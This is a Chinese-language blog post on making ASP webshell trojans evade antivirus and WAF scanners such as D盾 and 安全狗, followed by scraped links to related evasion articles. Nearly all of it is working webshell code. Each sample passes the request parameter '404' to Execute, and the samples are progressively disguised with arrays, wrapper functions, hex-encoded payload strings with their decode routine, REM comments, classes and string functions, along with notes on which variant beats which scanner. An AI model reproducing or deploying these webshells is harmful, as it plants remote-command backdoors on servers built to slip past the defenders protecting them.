shell 免杀aspx_asp免杀webshell木马总结
0x00 前言
asp免杀webshell木马总结
简单的介绍下asp的免杀,相对于php我们的asp还是不够灵活.
0x01 目录
数组
函数
加密
注释符
类
字符串操作
0x02 了解asp一句话
ASP解释器还有:VBScript
ASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//
ASP的执行函数 : Eval 、 Execute 、ExecuteGlobal
0x03 数组
利用数组来免杀,因为我们在php免杀中使用过数组,他的效果还不错,那么我们是否可以利用到asp来,当然答案是肯定的
其中定义数组的方法有多种方式,我们才用最简单方式来看看
dim a(5)
a(0)=request("404")
eXecUTe(a(0))
%>
简单的数组定义D盾就不认识了,为什么我会想到用数组来绕过,因为我发现函数调用的时候D盾不敏感,包括asp,php等
当然你还可以这样用,加上一点循环语句
dim array(1)
dim c
array(1)=request("404")
for each a in array
c = a & ""
next
execute(c)
%>
0x04 函数
这个是那天D盾更新,无意间测试出来的,发现d盾对函数传入不是很敏感
Function b():
b = request("404")
End Function
Function f():
eXecUTe(b())
End Function
f()
%>
0x05 加密
网上随便找了一段加密算法 但是测试发现D盾爆了一级,参数未知
eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600"))
function gw_jiemi(text)
const key="gw"
dim str : str=text
dim str1
dim str2 : str2=strreverse(str)
for i=1 to len(str2) step 4
str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))
next
gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))
end function
%>
既然都提示我们参数的问题了,那么简单的干扰一下吧,连接个空字符
eXecUTe(gw_jiemi("920022008400D4002200820047003700560057001700560027000200C60016006700560077007600")&"")
function gw_jiemi(text)
const key="gw"
dim str : str=text
dim str1
dim str2 : str2=strreverse(str)
for i=1 to len(str2) step 4
str1=str1 & ChrW(cint("&H" & mid(str2,i,4)))
next
gw_jiemi=mid(str1,len(key)+1,len(str)-len(key))
end function
%>
解密的算法是
function gw_jiami(text)
const key="gw"
dim str : str=key & text
dim str1
dim str2
for i=1 to len(str)
str2=hex(AscW(mid(str,i,1)))
for j=1 to 4-len(str2)
str2="0" & str2
next
str1=str1 & str2
next
gw_jiami=strreverse(str1)
end function
0x06 注释符
通过一个简单的注释符绕过安全狗还是比较简单的,
a = request("404")
b = a REM a
execute(b)
%>
怎么绕过d盾了想了几分钟发现可以这样
%>
0x07 类
在php中我们使用类可以很轻松的绕过,但是asp使用类现在d盾看的很紧,首先看看最简单的类
Class LandGrey
Private Sub Class_Initialize
execute request("404")
End Sub
End Class
Set X = New LandGrey
%>
利用Class_Initialize 初始化就调用我们的函数,但是已经不行了,那么我们简单的变形一下
Class LandGrey
private str_title
public property let setauthor(str)
execute str REM a
end property
End Class
Set a= New LandGrey
a.setauthor= request("404")
%>
这个D盾爆出一级,提示未知参数str,怎么绕过呢,我们可以用函数的方式把他包裹起来 跟前面方案一样
Class LandGrey
private str_title
public property let setauthor(str)
execute(str&"")
end property
End Class
Set a= New LandGrey
a.setauthor= request("404")
%>
但是提示语句没结束语法问题,那就改改,用括号包裹起来调用,同时利用REM注释后面的内容,d盾就会识别括号里面有内容,从而绕过
Class LandGrey
private str_title
public property let setauthor(str)
execute(str )REM a)
end property
End Class
Set a= New LandGrey
a.setauthor= request("404")
%>
前面说过他提示的参数没 赋值 那么我们就定义一个局部变量来赋值吧
Class LandGrey
private str
Private Sub Class_Initialize
str = ""
End Sub
public property let setauthor(str)
execute(str)
end property
End Class
Set a= New LandGrey
a.setauthor= request("404")
%>
0x08 字符串操作
前面php的webshell我们讲过,d盾是杀参数的,我们如何绕过的思路就是在传入参数这里做文章,先来一个简单的
a = request("404")
b = Left(a,99999)
execute(b)
%>
D盾直接爆4级,我们再找个函数包裹一下我们的a字符串,UCase大小写转换
a = request("404")
b = Left(UCase(a),99999)
execute(b)
%>
还是4级,那么我们在后面连接一个空格呢,那么他就能完美绕过
a = request("404")
b = Left(UCase(a)&"",99999)
execute(b)
%>
shell 免杀aspx_asp免杀webshell木马总结相关推荐
- WebShell 木马免杀过WAF
就算木马能正常运行,那么过段时间会不会被管理员杀掉?如何免杀?上面虽然木马上传成功了,但是只要管理员一杀毒,全部都能杀出来.而且,还会很明确的说这是后门.因此,作为攻击者就得会各种免杀技巧. 防御者的 ...
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- 杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩(论杀或者不杀 )
杀毒软件的查杀病毒的原理以及木马.病毒的免杀伎俩(论杀或者不杀 ) 无意中在网上看到的,描述通俗易懂,基本全是基础知识,权当了解吧. ================================= ...
- 远控免杀4---Evasion免杀
0x01 免杀能力一览表 1.下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterpert ...
- 远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
- 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀5---Veil免杀
0x01 免杀能力一览表 1.下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterpert ...
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
最新文章
- python类的成员函数_python特殊成员函数
- python3 读写文件
- python取出字符串中的偶数_从给定字符串中删除偶数个连续的重复字符
- 链路追踪在ERP系统中的应用实践
- arp病毒利用的Javascript技术
- android 仿搜索动画,Android仿京东顶部搜索框滑动伸缩动画效果
- [转贴] PHP 编程标准
- 2021年2月十大热门报告盘点(附百大热门报告列表及下载链接)
- 2017蓝桥杯c语言C组承压计算,2017蓝桥杯 省赛C题(承压计算)
- codeforces D. Palindrome pairs 动态规划
- OFD文件在线阅读器
- 手动解析App dSYM示例
- android u盘检测工具,android 检测是否插入U盘方法之一
- 微信小程序登陆\code详解
- 如何写出高分essay?高分essay文章结构分析
- nSMS-企业级短信中间件介绍
- 文档在线打印,保持样式不变解决方法
- 中空介孔载银二氧化硅聚苯乙烯微球/核壳聚苯乙烯/介孔二氧化硅微球/环氧树脂复合材料的制备
- 小米已成国产手机标杆,海外出货量碾压华为OV
- 7.cuBLAS开发指南中文版--cuBLAS中的cublasSetVector()和cublasGetVector()